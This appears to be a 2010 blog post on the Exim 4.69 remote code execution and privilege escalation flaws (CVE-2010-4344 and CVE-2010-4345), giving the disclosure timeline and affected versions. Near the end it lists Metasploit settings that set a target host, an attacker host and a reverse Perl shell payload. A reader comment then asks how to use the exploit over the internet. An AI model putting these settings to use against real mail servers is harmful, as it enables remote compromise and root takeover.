Vulnerability discovered the 2010-12-07 by Sergey Kononenko
Vulnerability confirmed the 2010-12-10 by David Woodhouse
Exploit released the 2010-12-10 by hdm & jduck
Vulnerability corrected the 2008-12-02 but neither identified as a vulnerability since 2 years ! So not ported in most OS distributions.
PoC provided by :
Affected version(s) :
Version before and equal to 4.69, depending on the distrib versioning
Tested on Debian Lenny 5.0 with :
dpkg -l | grep exim4
Two vulnerabilities, exploited since two years, have been discovered into the Exim MTA. Sergey Kononenko, employee of a Ukrainian company, following a hack of its IT infrastructure, unwittingly discovered a vulnerability in the mail server Exim4, which was exploitable for two years!
This vulnerability has been reported, on December 7, to the Exim maintainers, and the rumor quickly spread up. It will not take more than three days for Rapid7 researchers, authors of the Metasploit pen-testing framework, to develop a valid PoC that affects most Exim installations on all platforms (Debian, Ubuntu, Red Hat, Centos, etc..).
Share the same time, not one but two vulnerabilities have been discovered. The first, CVE-2010-4344, will permit a remote arbitrary code execution with the privileges of the user invoking the Exim mail software. The second, CVE-2010-4345, for its part, allows escalation of privileges from the user invoking the Exim mail software to super user root.
It is interesting to see that the first vulnerability was corrected December 2, 2008, but this correction had not been marked as a correction of vulnerability. This lack of communication has resulted that the distributions (Debian, Ubuntu, Red Hat, CentOS, etc.) providing Exim were not warned of the vulnerability, and therefore updating of the hidden vulnerability never been done until now.
dpkg -l | grep exim4
tail -f /var/log/exim4/mainlog
set RHOST 192.168.178.52
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
1 thought on “exim 4.69 remote code execution”
Do this exploit must be done locally? i mean on the same network? I ask because of thoes ips! 192.168.172.* . Can i use this exploit via internet?
Thanks and sorry. Im newbie
Comments are closed.